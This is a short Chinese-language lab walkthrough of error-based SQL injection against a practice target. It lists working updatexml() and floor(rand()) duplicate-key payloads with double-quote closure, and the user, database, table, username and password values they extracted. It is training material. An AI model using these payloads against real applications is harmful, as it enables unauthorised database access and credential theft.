开启靶机
使用updatexml函数,双引号闭合
爆出用户名:root@localhost
?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
?id=1" union select updatexml(1,concat(0x2A,(select user()),0x2A),1)--+
爆库名:security
?id=1" union select updatexml(1,concat(0x2A,(select database()),0x2A),1)--+
爆表名:emails,referers,uagents,users
select updatexml(1,concat(0x2A,(select group_concat(table_name)from information_schema.`TABLES` where table_schema='security' limit 0,1),0x2A),1) --+
爆用户名:Dumb,Angelina,Dummy,secure,stup
select updatexml(1,concat(0x7e,(select group_concat(username)from users limit 0,1),0x7e),1)
这里的用户名没有全部爆出来,想全部爆出来,可以使用substr函数
爆密码:Dumb,I-kill-you,p@ssword,crappy
select updatexml(1,concat(0x7e,(select group_concat(password)from users),0x7e),1)
主键重复型
爆用户名:root@localhost
?id=1" and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
爆库名:security
?id=1" union all select 1,count(*),1 from information_schema.tables group by concat(floor(rand(0)*2),0x7e,database()) --+
爆库名:ctftraining
?id=1" and (select 1 from (select count(*),concat(0x23,(database()),0x23,floor(rand(0)*2)) as x from information_schema.`columns` group by x) as y)--+
爆表名:username
?id=1" and (select 1 from (select count(*),concat(0x23,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x23,floor(rand(0)*2)) as x from information_schema.`columns` group BY x) as y)--+